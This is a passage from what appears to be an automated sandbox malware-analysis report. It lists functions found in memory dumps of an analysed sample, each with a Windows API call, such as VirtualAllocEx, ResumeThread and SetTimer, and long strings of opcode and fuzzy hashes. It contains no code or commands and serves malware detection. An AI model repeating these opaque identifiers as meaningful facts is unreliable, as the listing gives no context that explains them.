                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B9B5A22,00000000,00000000,0409412C,030B0868), ref: 0B9B5E70
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePeek
                                            • String ID:
                                            • API String ID: 2222842502-0
                                            • Opcode ID: 631c48bdb2f6eba461567fec80aa0c73405dd59d5b53509e4b65683a369df667
                                            • Instruction ID: 5753957ab3768a2e68f1a4adceeaada102b2c6ff92d3c97e69329dc783c15b7a
                                            • Opcode Fuzzy Hash: 631c48bdb2f6eba461567fec80aa0c73405dd59d5b53509e4b65683a369df667
                                            • Instruction Fuzzy Hash: 521114B6C00249DFDB10CF9AD944BDEBBF4FB48320F14842AE458A7250C378A645CF61
                                            Function 0C2F30E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowTextW.USER32(?,00000000), ref: 0C2F314A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID:
                                            • API String ID: 530164218-0
                                            • Opcode ID: 1bfa51bac16ed2b79f2dd36dae572c8262ec9d8bd5034e794fee9d74720747e7
                                            • Instruction ID: ca473d5b7a616bb17db3043897978e5561c75c38debb4bdb974f9092cfe9851b
                                            • Opcode Fuzzy Hash: 1bfa51bac16ed2b79f2dd36dae572c8262ec9d8bd5034e794fee9d74720747e7
                                            • Instruction Fuzzy Hash: 3A1129B6D002099FDB10CF9AC844BDFFBF4EB48320F10842AE458A7650D374A545CF65
                                            Function 0767C498 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0767C506
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 1967cff2de27261da6b8aa74741c4bd63985b28b560b149665df9d02d806d2d2
                                            • Instruction ID: 53a2d77960e4d4723bf689e7c217bef70a44665329ce1a1eff7717bbffc99955
                                            • Opcode Fuzzy Hash: 1967cff2de27261da6b8aa74741c4bd63985b28b560b149665df9d02d806d2d2
                                            • Instruction Fuzzy Hash: C21114728002499BDB20DFAAC844BEFBBF5AF48320F148819E555A7250C776A550CFA4
                                            Function 0B9B61A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B9B5AAF,00000000,0409412C,030B0868,00000000,?), ref: 0B9B620D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 7845349f3a635e7a2c8c871168344a0314872dbe63dbf75ae299dc8004e632cb
                                            • Instruction ID: fd9c798258658fd2c851074c9ba2c08623b1e8d0e712370d44bd7b87eb5000e1
                                            • Opcode Fuzzy Hash: 7845349f3a635e7a2c8c871168344a0314872dbe63dbf75ae299dc8004e632cb
                                            • Instruction Fuzzy Hash: 0A11E4B58002499FDB10CF9AD984BDEFBF4EB48310F14842AE458A3240C378A584CFA5
                                            Function 0767C310 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: dbbadeb70133234aaa57c92adb52a9a90a8369e399612e16447e4b34c69c3493
                                            • Instruction ID: 7c95f86ad5f82670e3fee0d4b90e5a219bb8bee8ebb71a54aa3c6f6279d38367
                                            • Opcode Fuzzy Hash: dbbadeb70133234aaa57c92adb52a9a90a8369e399612e16447e4b34c69c3493
                                            • Instruction Fuzzy Hash: 3F1128B19003488BDB20DFAAC8457DFFBF5AF88224F148429D559A7240C7756540CFA5
                                            Function 0B9B0C28 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0B9B0C85
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 0a0eec598f8d804af40b7aef3bad52ba91ab9295bbc46276e4ed1a4d506ad90b
                                            • Instruction ID: 566b59990e1d8db10fae012f63d395aa6de77f6fb16305ed12574b48a85cedd0
                                            • Opcode Fuzzy Hash: 0a0eec598f8d804af40b7aef3bad52ba91ab9295bbc46276e4ed1a4d506ad90b
                                            • Instruction Fuzzy Hash: 721106B5800349DFDB10CF9AC945BEEFBF8EB48320F10846AE558A3240D379A544CFA5
                                            Function 02ECB0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02ECB126
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 597cf66dcf7f781c00b8fe3036696269dbb2b41ffedc9ce7e574b92f2498df47
                                            • Instruction ID: f4912c2d42837752283775ebf1bd61a573f522a62a4b2a0be9caa74e6ed6cfbb
                                            • Opcode Fuzzy Hash: 597cf66dcf7f781c00b8fe3036696269dbb2b41ffedc9ce7e574b92f2498df47
                                            • Instruction Fuzzy Hash: A61102B5C003498FCB20CF9AD945BDEFBF4AB88218F10842ED468A7300C375A545CFA1
                                            Function 077889B0 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,055C6428,?,?,?,?,?,?,07789A20,00000000,00000000,?), ref: 07789BBD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID: Timer
                                            • String ID:
                                            • API String ID: 2870079774-0
                                            • Opcode ID: cc631ff589cc65fbc7a1f59fa463ca5165542fec6c1ce54f14844c9fc83d18c9
                                            • Instruction ID: 10eeba5b12ff99cbd1b6f4fe27d6334c69e482bbf4a4dad87bf39d1b276c81de
                                            • Opcode Fuzzy Hash: cc631ff589cc65fbc7a1f59fa463ca5165542fec6c1ce54f14844c9fc83d18c9
                                            • Instruction Fuzzy Hash: 8B1106B58003499FDB60DF9AC845BEEBFF8EB48320F108459E554A7340C375A944CFA5
                                            Function 0B9B6678 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B9B5B67), ref: 0B9B66DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: DispatchMessage
                                            • String ID:
                                            • API String ID: 2061451462-0
                                            • Opcode ID: dba7681a56b7c5fcd947d1394367ba4fc9ebf5991f5144049b0843c82684e933
                                            • Instruction ID: 55cb112b45497f0ffa482ee140f724a7587c0695cefc4f488d492eb60cbbcf7b
                                            • Opcode Fuzzy Hash: dba7681a56b7c5fcd947d1394367ba4fc9ebf5991f5144049b0843c82684e933
                                            • Instruction Fuzzy Hash: 371110B1C047488FCB20CFAAD444BCEFFF4AB49224F10846AE458A7210C375A544CFA5
                                            Function 0C2FDAF1 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0C2FDB55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: a429ca941760d2ad04cf6b8816d6510e6cc23258eaff4e811058700628d95205
                                            • Instruction ID: c619dff42e94f1d4b8217d374fcd407211018aa2336c62d11ff06221135c4285
                                            • Opcode Fuzzy Hash: a429ca941760d2ad04cf6b8816d6510e6cc23258eaff4e811058700628d95205
                                            • Instruction Fuzzy Hash: 2B11F2B68002499FDB20CF99C985BDEBBF4EB48320F14845AE568A7610C375A585CFA5
                                            Function 0B9B47DC Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B9B5B67), ref: 0B9B66DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: DispatchMessage
                                            • String ID:
                                            • API String ID: 2061451462-0
                                            • Opcode ID: bd7da493192204ff6853655c66b5cfb2c45efe9e0addab914107da417fd201b7
                                            • Instruction ID: f41127ddaef494a71e9748f561db5681af0c503dbcd77a4c2338b725bdea38a2
                                            • Opcode Fuzzy Hash: bd7da493192204ff6853655c66b5cfb2c45efe9e0addab914107da417fd201b7
                                            • Instruction Fuzzy Hash: F111E0B5C04649DFCB20DF9AD544BDEFBF4EB48214F10856AE468A7240D374A544CFA9
                                            Function 0C2FDAF8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0C2FDB55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 57a4f1b09449dbf5c7eb6e31230068f1c4f9244fdd21805129af41c8eeada82e
                                            • Instruction ID: c21cf587c98f8bef81b131c1cbef2b96eec8452fec1a4ff47f64fcb43b8a7191
                                            • Opcode Fuzzy Hash: 57a4f1b09449dbf5c7eb6e31230068f1c4f9244fdd21805129af41c8eeada82e
                                            • Instruction Fuzzy Hash: F711D3B58003499FDB20DF9AC885BDEFBF8EB48324F10845AE558A7650C375A544CFA5
                                            Function 07789B5A Relevance: 1.5, APIs: 1, Instructions: 43timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,055C6428,?,?,?,?,?,?,07789A20,00000000,00000000,?), ref: 07789BBD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID: Timer
                                            • String ID:
                                            • API String ID: 2870079774-0
                                            • Opcode ID: 8ab211ca4f299ea7c17aef86351060ad47b3b39e252c5534d23cb9b72c06ab1a
                                            • Instruction ID: 377306beca79ccf4634fbe3d58dd1a17d2cc37f64f1898caa606e08b073ca1ce
                                            • Opcode Fuzzy Hash: 8ab211ca4f299ea7c17aef86351060ad47b3b39e252c5534d23cb9b72c06ab1a
                                            • Instruction Fuzzy Hash: 481103B5800309DFDB10DF99C945BEEBBF4EB48320F10881AE558A7340C375A544CFA1
                                            Function 075923EF Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07592422
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 03b655787879d1504d51d15785df61e67abdbd6007261a9ccfe0f78081adfb86
                                            • Instruction ID: f4d4fa04eeb9ea51bd4b4d6e458c5e77de32d839f8b8b93db500190255c60038
                                            • Opcode Fuzzy Hash: 03b655787879d1504d51d15785df61e67abdbd6007261a9ccfe0f78081adfb86
                                            • Instruction Fuzzy Hash: 46E022B27442108FCB16AF71E8098AA3FA5EFC582030545EBE449CB3A2DE60CC02C3A1
                                            Function 07590358 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07592422
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 537133100e34920a789cd12141c66443b6307c9eaf64456a31facd796ed4afba
                                            • Instruction ID: 573b5ced2b991401bdda065538c7821d3df17ee78e36d5287780452b0c2dd076
                                            • Opcode Fuzzy Hash: 537133100e34920a789cd12141c66443b6307c9eaf64456a31facd796ed4afba
                                            • Instruction Fuzzy Hash: BBE020B27503145B8B18BB35C84CC6B379DFF89D307404969F40AC7350CD50DC01C295
                                            Function 0184D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408256633.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 718c1af4420a255754124ac941c5ecfa1fce7cd376662b05544db56be7d0f3d1
                                            • Instruction ID: dda02d3f4913af3a17030755188b7d33b45bfd9b04933ac2d2059765c47e281b
                                            • Opcode Fuzzy Hash: 718c1af4420a255754124ac941c5ecfa1fce7cd376662b05544db56be7d0f3d1
                                            • Instruction Fuzzy Hash: 44214871504308DFDB05DF54D9C0B56BBA5FBA4324F20C26DE8098B246C73AE556CAA2
                                            Function 0185D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408307153.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_185d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4d645d0657388d2b1e6a719b903fd9d0f14ff0ff5bbedf02e2f29f0b1c74eed
                                            • Instruction ID: 72ae5e32e836ccb660f5130f7579f75048a0788e1a80e0d61b971286ca6466a5
                                            • Opcode Fuzzy Hash: b4d645d0657388d2b1e6a719b903fd9d0f14ff0ff5bbedf02e2f29f0b1c74eed
                                            • Instruction Fuzzy Hash: C0210471504304EFDB45DF94D9C0B26BBA5FB84328F20C6ADEC498B252C376E546CA62
                                            Function 0185D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408307153.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_185d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d743c55a52b0ea4fff074b5defee5b74ca38d81fc999aa41c578bd68482d281
                                            • Instruction ID: 16a206c9ada64282fa6b4872d62e3eb2a8d6137f36c90403e7ffdab995cd1932
                                            • Opcode Fuzzy Hash: 4d743c55a52b0ea4fff074b5defee5b74ca38d81fc999aa41c578bd68482d281
                                            • Instruction Fuzzy Hash: F4212571504304DFDB55DF54D4C0B16BBA1FB84314F20C66DEC098B242C33AD547CA62
                                            Function 0185D005 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408307153.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_185d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c107fe22f0aee33e595e2002b67f386e896c4f776651b193e6c0158352cce09
                                            • Instruction ID: 188f03261cecdf1c8435a2980c4813982c3353d54aa2e20bd1cbc442752b74d7
                                            • Opcode Fuzzy Hash: 4c107fe22f0aee33e595e2002b67f386e896c4f776651b193e6c0158352cce09
                                            • Instruction Fuzzy Hash: AB2192755093808FDB13CF24D994715BF71EB46314F28C6EADC498B6A7C33A950ACB62
                                            Function 0184D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408256633.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction ID: 971cb651f4cddd457c3324237b2d3d4c8b89e097b6668c9b3c35c60d690623e6
                                            • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                            • Instruction Fuzzy Hash: F611E176404244CFDB12CF54D5C4B56BF72FB94324F24C2A9D8094B257C33AE556CBA1
                                            Function 0185D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408307153.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_185d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction ID: 0478c9503bba1b419c6cda33d55d75b1542f5db9767c855d033bd0412fe43be8
                                            • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                                            • Instruction Fuzzy Hash: ED11BB75504280DFDB12CF54C5C4B15BBA2FB84324F24C6AEDC498B296C33AE44ACB61
                                            Function 0184D745 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408256633.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 898f0b37e5198ff6498ad57b1ed3bf9c17adf9fee1a93543defde08f84204eaf
                                            • Instruction ID: ece9d63c83e064796e791590758ba5f3d82f0623a0cc640bcc018cb1827f78cf
                                            • Opcode Fuzzy Hash: 898f0b37e5198ff6498ad57b1ed3bf9c17adf9fee1a93543defde08f84204eaf
                                            • Instruction Fuzzy Hash: 6001F73100838CABF720DB69CC84B66BFD8DF51338F14C62AED088A282CA799540CA71
                                            Function 0184D744 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408256633.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_184d000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2353f20f52112f19e147f54251bfcdde8094ba2c2e1d3858caf2e285115423e1
                                            • Instruction ID: b409feac17c610f8ad658990bc58110a62ed774ce873336aaf2ca918915fc201
                                            • Opcode Fuzzy Hash: 2353f20f52112f19e147f54251bfcdde8094ba2c2e1d3858caf2e285115423e1
                                            • Instruction Fuzzy Hash: 0DF068714043449FE7209E19CC84B62FF98EB51734F14C55AED484A287C7759844CA71

                                            Non-executed Functions

                                            Function 0B9BE530 Relevance: 1.9, Strings: 1, Instructions: 693COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fff?
                                            • API String ID: 0-4136771917
                                            • Opcode ID: 6747db069c840279f3f2309a66706478996ff0addab3c5143ecf009d7a676e2a
                                            • Instruction ID: a44bb6b3fa3cb23b38d1dd8bec56ef9133f7f140658f843f30a58021d1ca6a38
                                            • Opcode Fuzzy Hash: 6747db069c840279f3f2309a66706478996ff0addab3c5143ecf009d7a676e2a
                                            • Instruction Fuzzy Hash: F7623931810A1ADFCF11DF50C984ADAB7B6FF99304F1586D5E9086B121EB71AA95CF80
                                            Function 0B9BE521 Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fff?
                                            • API String ID: 0-4136771917
                                            • Opcode ID: b2ab489c839772d47abf1d3429dcaeb6b3cb4ddd30ebf4076bedd088944a0b1a
                                            • Instruction ID: 041e7b445c2cbcc257f84cf4585322dc55ed0d175114f9c457b7f3990965ac5b
                                            • Opcode Fuzzy Hash: b2ab489c839772d47abf1d3429dcaeb6b3cb4ddd30ebf4076bedd088944a0b1a
                                            • Instruction Fuzzy Hash: 5A126B35800619DFCF11DF50C988ADABBB6FF49304F158595E9086B266E7729E89CF80
                                            Function 0B9B86B8 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 20b64382e07095413964d845b50252b189f7fd1c8928033c75fde8bc274042e0
                                            • Instruction ID: c07514b0e41435366ff73bf2d4c9369d99b99369570d03d6fd2a3bfbc2af1b4c
                                            • Opcode Fuzzy Hash: 20b64382e07095413964d845b50252b189f7fd1c8928033c75fde8bc274042e0
                                            • Instruction Fuzzy Hash: 85918070E002199FDB18DF69C594AAFBBFAFFC8710F108529E415EB250DB3599018BA1
                                            Function 07679E00 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce6f7116d2898fcd95fa6abf1ca23a1c560ab01a2344e64cabafd9706475681
                                            • Instruction ID: a5625bf5560ce1be528bf1d3da4d6fb5594e87575598b8432cbf5e6b88dc0c21
                                            • Opcode Fuzzy Hash: 0ce6f7116d2898fcd95fa6abf1ca23a1c560ab01a2344e64cabafd9706475681
                                            • Instruction Fuzzy Hash: 62E118B4E002198FDB14DFA8C580AAEBBF2FF89304F248169D815AB356D735AD41CF60
                                            Function 076799C8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9686960dc12fa5d9bb79579e75d3a31f78bab45aa332bb99cec5b5744a3b5bf6
                                            • Instruction ID: d4d46715adca9d4ac8da1b8fcf10ce117c2dc6d1c5670e0cdd9dec59f0a3f854
                                            • Opcode Fuzzy Hash: 9686960dc12fa5d9bb79579e75d3a31f78bab45aa332bb99cec5b5744a3b5bf6
                                            • Instruction Fuzzy Hash: BCE1E6B4E102198FDB14DFA9C580AAEBBF2FF89304F248169D815AB356D735AD41CF60
                                            Function 0778B2A8 Relevance: .3, Instructions: 277COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b102216d14da9e0c5949f96dbfa783a876b55a4e0ac1474e4b97c03c1b6b6ac2
                                            • Instruction ID: d3cbd167fa27c5ba9db9181bdf0ce001271bdec294a589f2777f5580bcf6db8e
                                            • Opcode Fuzzy Hash: b102216d14da9e0c5949f96dbfa783a876b55a4e0ac1474e4b97c03c1b6b6ac2
                                            • Instruction Fuzzy Hash: FBE1E53582065A9BCB10EF74D990AE9B7B1FF95300F509B9AD40977220EF746AC8CF91
                                            Function 02ECDD14 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 544bcaca0895e127547de844addae3c4f53ef35ba771947d85ecc5b60ff22346
                                            • Instruction ID: d8a6ea587b2e56fc25007a757a8cb025a94e32c8e48246b3bba49299ddd4cc9a
                                            • Opcode Fuzzy Hash: 544bcaca0895e127547de844addae3c4f53ef35ba771947d85ecc5b60ff22346
                                            • Instruction Fuzzy Hash: B0A17B32E406099FCF05DFB4C98059EBBB3BF85304B25956EE805AB255DB36E946CB80
                                            Function 0778B2E0 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415308141.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29314323d4be83ba00314b46c5c6d1b85a388b921d6e8291f984ebf5b7c3439c
                                            • Instruction ID: d65ce7146dd55595485cb8e1a94d6eadec1bf9a2f48879e3f5c2571ce6120f55
                                            • Opcode Fuzzy Hash: 29314323d4be83ba00314b46c5c6d1b85a388b921d6e8291f984ebf5b7c3439c
